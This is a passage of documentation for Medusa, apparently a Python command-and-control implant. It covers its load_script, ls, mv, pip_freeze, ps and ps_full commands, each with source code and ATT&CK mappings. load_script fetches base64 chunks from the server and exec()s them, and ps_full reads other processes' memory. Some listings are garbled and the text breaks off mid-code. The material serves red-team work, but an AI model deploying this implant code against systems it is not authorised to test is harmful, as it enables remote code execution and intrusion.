Depending on the script content being interpreted, you can include functions that may be called later, using the `setattr()` function and Medusa's `eval_code` function. Firstly, the function itself: ```Python def load_script(self, task_id, file): total_chunks = 1 chunk_num = 0 cmd_code = "" while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] chunk_num+=1 total_chunks = chunk["total_chunks"] cmd_code += base64.b64decode(chunk["chunk_data"]).decode() if cmd_code: exec(cmd_code) else: return "Failed to load script" ``` If we pass a script like the one below to Medusa, it'll print `hello` immediately. Then, as we've registered our `hello_again` function, we can call it again with the Medusa command: `eval_code self.hello_again()`. This will then execute the second print statement, to display `hello again`. A very simple example, but hopefully one that articulates what's possible here. ``` print("hello") def hello_again(self): print("hello again") setattr(medusa, "hello_again", hello_again) ``` {{% notice warning %}} Script content must be compatible with the version of Python the agent is running with! {{% /notice %}} ================================================ FILE: documentation-payload/medusa/commands/ls.md ================================================ +++ title = "ls" chapter = false weight = 100 hidden = false +++ ## Summary Get attributes about a file and display it to the user via API calls. 
No need for quotes and relative paths are fine - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### path - Description: Path of file or folder on the current system to list - Required Value: True - Default Value: . ## Usage ``` ls /path/to/file ``` ## MITRE ATT&CK Mapping - T1106 - T1083 ## Detailed Summary This command used python `os` library functions to get the contents of directories and metadata of files. Python 2.7: ```Python def ls(self, task_id, path, file_browser=False): if path == ".": file_path = self.current_directory else: file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) file_details = os.stat(file_path) target_is_file = os.path.isfile(file_path) target_name = os.path.basename(file_path.rstrip(os.sep)) file_browser = { "host": socket.gethostname(), "is_file": target_is_file, "permissions": {"octal": oct(file_details.st_mode)[-3:]}, "name": target_name if target_name != "." \ else os.path.basename(self.current_directory.rstrip(os.sep)), "parent_path": os.path.abspath(os.path.join(file_path, os.pardir)), "success": True, "access_time": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)), "modify_time": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)), "size": file_details.st_size, "update_deleted": True, } files = [] if not target_is_file: for entry in os.listdir(file_path): full_path = os.path.join(file_path, entry) file = {} file['name'] = entry file['is_file'] = True if os.path.isfile(full_path) else False try: file_details = os.stat(full_path) file["permissions"] = { "octal": oct(file_details.st_mode)[-3:]} file["access_time"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)) file["modify_time"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)) file["size"] = file_details.st_size except OSError as e: pass files.append(file) file_browser["files"] = files task 
= [task for task in self.taskings if task["task_id"] == task_id] task[0]["file_browser"] = file_browser return { "files": files } ``` Python 3.8 ```Python def ls(self, task_id, path, file_browser=False): if path == ".": file_path = self.current_directory else: file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) file_details = os.stat(file_path) target_is_file = os.path.isfile(file_path) target_name = os.path.basename(file_path.rstrip(os.sep)) file_browser = { "host": socket.gethostname(), "is_file": target_is_file, "permissions": {"octal": oct(file_details.st_mode)[-3:]}, "name": target_name if target_name != "." \ else os.path.basename(self.current_directory.rstrip(os.sep)), "parent_path": os.path.abspath(os.path.join(file_path, os.pardir)), "success": True, "access_time": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)), "modify_time": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)), "size": file_details.st_size, "update_deleted": True, } files = [] if not target_is_file: with os.scandir(file_path) as entries: for entry in entries: file = {} file['name'] = entry.name file['is_file'] = True if entry.is_file() else False try: file_details = os.stat(os.path.join(file_path, entry.name)) file["permissions"] = { "octal": oct(file_details.st_mode)[-3:]} file["access_time"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)) file["modify_time"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)) file["size"] = file_details.st_size except OSError as e: pass files.append(file) file_browser["files"] = files task = [task for task in self.taskings if task["task_id"] == task_id] task[0]["file_browser"] = file_browser return { "files": files } ``` This command helps populate the file browser, which is where all this data can be seen. 
================================================ FILE: documentation-payload/medusa/commands/mv.md ================================================ +++ title = "mv" chapter = false weight = 100 hidden = false +++ ## Summary Move a given file or folder to a specified location. No quotes are necessary and relative paths are fine - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### source_path - Description: path of file/folder to move - Required Value: True - Default Value: None #### dest_path - Description: path to move file/folder to - Required Value: True - Default Value: None ## Usage ### Without Popup Option ``` mv path/of/file_or_folder /dest/to/move/to ``` ## Detailed Summary You can either type `mv` and get a popup to fill in the paths, or provide the paths on the command line. ```Python def mv(self, task_id, source, destination): import shutil source_path = source if source[0] == os.sep \ else os.path.join(self.current_directory,source) dest_path = destination if destination[0] == os.sep \ else os.path.join(self.current_directory,destination) shutil.move(source_path, dest_path) ``` ================================================ FILE: documentation-payload/medusa/commands/pip_freeze.md ================================================ +++ title = "pip_freeze" chapter = false weight = 100 hidden = false +++ ## Summary Prints the currently installed python packages on the target system - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` pip_freeze ``` ## Detailed Summary Attempts to list packages (ideally with version information) using a series of methods, based on availability: ```Python def pip_freeze(self, task_id): out="" try: import pkg_resources installed_packages = pkg_resources.working_set installed_packages_list = sorted(["%s==%s" % (i.key, i.version) for i in installed_packages]) return "\n".join(installed_packages_list) except: out+="[*] 
pkg_resources module not installed.\n" try: from pip._internal.operations.freeze import freeze installed_packages_list = freeze(local_only=True) return "\n".join(installed_packages_list) except: out+="[*] pip module not installed.\n" try: import pkgutil installed_packages_list = [ a for _, a, _ in pkgutil.iter_modules()] return "\n".join(installed_packages_list) except: out+="[*] pkgutil module not installed.\n" return out+"[!] No modules available to list installed packages." ``` ================================================ FILE: documentation-payload/medusa/commands/ps.md ================================================ +++ title = "ps" chapter = false weight = 100 hidden = false +++ ## Summary This uses the ctypes library to interface with Windows API to enumerate process IDs and return a limited (marginally better opsec) process list. - Python Versions Supported: 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` ps ``` ## MITRE ATT&CK Mapping - T1057 ## Detailed Summary This function will only return PID, process name, architecture and binary path. Further details can be pulled back with `ps_full`. 
```Python def ps(self, task_id): import sys, os.path, ctypes, ctypes.wintypes, re from ctypes import create_unicode_buffer, GetLastError def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Psapi = ctypes.WinDLL('Psapi.dll') EnumProcesses = Psapi.EnumProcesses EnumProcesses.restype = ctypes.wintypes.BOOL GetProcessImageFileName = Psapi.GetProcessImageFileNameA GetProcessImageFileName.restype = ctypes.wintypes.DWORD Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool IsWow64Process = Kernel32.IsWow64Process PROCESS_QUERY_INFORMATION = 0x0400 WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7 MAX_PATH = 260 PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 TOKEN_QUERY = 0x0008 TOKEN_READ = 0x00020008 TOKEN_IMPERSONATE = 0x00000004 TOKEN_QUERY_SOURCE = 0x0010 TOKEN_DUPLICATE = 0x0002 TOKEN_ASSIGN_PRIMARY = 0x0001 ProcessBasicInformation = 0 ProcessDebugPort = 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value def query_dos_device(drive_letter): chars = 1024 drive_letter = drive_letter p = create_unicode_buffer(chars) if 0 == Kernel32.QueryDosDeviceW(drive_letter, p, chars): pass return p.value def create_drive_mapping(): mappings = {} for letter in (chr(l) for l in range(ord('C'), ord('Z')+1)): try: letter = u'%s:' % letter mapped = query_dos_device(letter) mappings[mapped] = letter except WindowsError: pass return mappings 
mappings = create_drive_mapping() def normalise_binpath(path): match = re.match(r'(^\\Device\\[a-zA-Z0-9]+)(\\.*)?$', path) if not match: return f"Cannot convert {path} into a Win32 compatible path" if not match.group(1) in mappings: return None drive = mappings[match.group(1)] if not drive or not match.group(2): return drive return drive + match.group(2) processes = [] count = 32 while True: ProcessIds = (ctypes.wintypes.DWORD*count)() cb = ctypes.sizeof(ProcessIds) BytesReturned = ctypes.wintypes.DWORD() if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)): if BytesReturned.value0: filename = os.path.basename(ImageFileName.value) process["name"] = filename.decode() process["bin_path"] = normalise_binpath(ImageFileName.value.decode()) CloseHandle(hProcess) processes.append(process) task = [task for task in self.taskings if task["task_id"] == task_id] task[0]["processes"] = processes return { "processes": processes } ``` This output is turned into a sortable table via a browserscript. ================================================ FILE: documentation-payload/medusa/commands/ps_full.md ================================================ +++ title = "ps_full" chapter = false weight = 100 hidden = false +++ ## Summary This uses the ctypes library to interface with Windows API to enumerate process IDs and return a full process list. - Python Versions Supported: 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` ps_full ``` ## MITRE ATT&CK Mapping - T1057 ## Detailed Summary In addition to what is returned with `ps`, this function returns the PPID, integrity level and command line parameters. 
```Python def ps_full(self, task_id): import sys, os.path, ctypes, ctypes.wintypes from ctypes import create_unicode_buffer, GetLastError def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Psapi = ctypes.WinDLL('Psapi.dll') EnumProcesses = Psapi.EnumProcesses EnumProcesses.restype = ctypes.wintypes.BOOL Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool IsWow64Process = Kernel32.IsWow64Process GetCurrentProcess = Kernel32.GetCurrentProcess GetCurrentProcess.restype = ctypes.wintypes.HANDLE GetCurrentProcess.argtypes = () ReadProcessMemory = Kernel32.ReadProcessMemory ReadProcessMemory.errcheck = _check_bool ReadProcessMemory.argtypes = ( ctypes.wintypes.HANDLE, ctypes.wintypes.LPCVOID, ctypes.wintypes.LPVOID, SIZE_T, ctypes.POINTER(SIZE_T)) PROCESS_VM_READ = 0x0010 PROCESS_QUERY_INFORMATION = 0x0400 MAX_PATH = 260 PROCESS_QUERY_INFORMATION = 0x0400 ProcessBasicInformation = 0 ProcessDebugPort = 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value class RemotePointer(ctypes._Pointer): def __getitem__(self, key): size = None if not isinstance(key, tuple): raise KeyError('must be (index, handle[, size])') if len(key) > 2: index, handle, size = key else: index, handle = key if isinstance(index, slice): raise TypeError('slicing is not supported') dtype = self._type_ offset = ctypes.sizeof(dtype) * index address = 
PVOID.from_buffer(self).value + offset simple = issubclass(dtype, ctypes._SimpleCData) if simple and size is not None: if dtype._type_ == ctypes.wintypes.WCHAR._type_: buf = (ctypes.wintypes.WCHAR * (size // 2))() else: buf = (ctypes.c_char * size)() else: buf = dtype() nread = SIZE_T() Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), \ ctypes.sizeof(buf), ctypes.byref(nread)) if simple: return buf.value return buf _remote_pointer_cache = {} def RPOINTER(dtype): if dtype in _remote_pointer_cache: return _remote_pointer_cache[dtype] name = 'RP_%s' % dtype.__name__ ptype = type(name, (RemotePointer,), {'_type_': dtype}) _remote_pointer_cache[dtype] = ptype return ptype RPWSTR = RPOINTER(ctypes.wintypes.WCHAR) class UNICODE_STRING(ctypes.Structure): _fields_ = (('Length', ctypes.wintypes.USHORT), ('MaximumLength', ctypes.wintypes.USHORT), ('Buffer', RPWSTR)) class LIST_ENTRY(ctypes.Structure): pass RPLIST_ENTRY = RPOINTER(LIST_ENTRY) LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY), ('Blink', RPLIST_ENTRY)) class PEB_LDR_DATA(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 8), ('Reserved2', PVOID * 3), ('InMemoryOrderModuleList', LIST_ENTRY)) RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA) class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 16), ('Reserved2', PVOID * 10), ('ImagePathName', UNICODE_STRING), ('CommandLine', UNICODE_STRING)) RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS) PPS_POST_PROCESS_INIT_ROUTINE = PVOID class PEB(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 2), ('BeingDebugged', ctypes.wintypes.BYTE), ('Reserved2', ctypes.wintypes.BYTE * 1), ('Reserved3', PVOID * 2), ('Ldr', RPPEB_LDR_DATA), ('ProcessParameters', RPRTL_USER_PROCESS_PARAMETERS), ('Reserved4', ctypes.wintypes.BYTE * 104), ('Reserved5', PVOID * 52), ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE), ('Reserved6', ctypes.wintypes.BYTE * 128), ('Reserved7', 
PVOID * 1), ('SessionId', ctypes.wintypes.ULONG)) RPPEB = RPOINTER(PEB) class PROCESS_BASIC_INFORMATION(ctypes.Structure): _fields_ = (('Reserved1', PVOID), ('PebBaseAddress', RPPEB), ('Reserved2', PVOID * 2), ('UniqueProcessId', ULONG_PTR), ('InheritedFromUniqueProcessId', ULONG_PTR)) def NtError(status): import sys descr = 'NTSTATUS(%#08x) ' % (status % 2**32,) if status & 0xC0000000 == 0xC0000000: descr += '[Error]' elif status & 0x80000000 == 0x80000000: descr += '[Warning]' elif status & 0x40000000 == 0x40000000: descr += '[Information]' else: descr += '[Success]' if sys.version_info[:2] < (3, 3): return WindowsError(status, descr) return OSError(None, descr, None, status) ntdll = ctypes.WinDLL('ntdll.dll') NtQueryInformationProcess = ntdll.NtQueryInformationProcess NtQueryInformationProcess.restype = NTSTATUS NtQueryInformationProcess.argtypes = ( ctypes.wintypes.HANDLE, PROCESSINFOCLASS, PVOID, ctypes.wintypes.ULONG, PULONG) class ProcessInformation(object): _close_handle = False _closed = False _module_names = None def __init__(self, process_id=None, handle=None): if process_id is None and handle is None: handle = GetCurrentProcess() elif handle is None: handle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, process_id) self._close_handle = True self._handle = handle if not self._query_info() or (process_id is not None \ and self._process_id != process_id): return def __del__(self, CloseHandle=CloseHandle): if self._close_handle and not self._closed: try: CloseHandle(self._handle) except WindowsError as e: pass self._closed = True def _query_info(self): info = PROCESS_BASIC_INFORMATION() handle = self._handle status = NtQueryInformationProcess(handle, ProcessBasicInformation, ctypes.byref(info), ctypes.sizeof(info), None) if status < 0: return False self._process_id = info.UniqueProcessId self._parent_process_id = info.InheritedFromUniqueProcessId self._peb = peb = info.PebBaseAddress[0, handle] self._params = peb.ProcessParameters[0, 
handle] Is64Bit = ctypes.c_int32() IsWow64Process(handle, ctypes.byref(Is64Bit)) self._arch = "x86" if Is64Bit.value else "x64" @property def process_id(self): return self._process_id @property def session_id(self): return self._peb.SessionId @property def image_path(self): ustr = self._params.ImagePathName return ustr.Buffer[0, self._handle, ustr.Length] @property def command_line(self): ustr = self._params.CommandLine buf = ustr.Buffer[0, self._handle, ustr.Length] return buf processes = [] count = 32 while True: ProcessIds = (ctypes.wintypes.DWORD*count)() cb = ctypes.sizeof(ProcessIds) BytesReturned = ctypes.wintypes.DWORD() if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)): if BytesReturned.value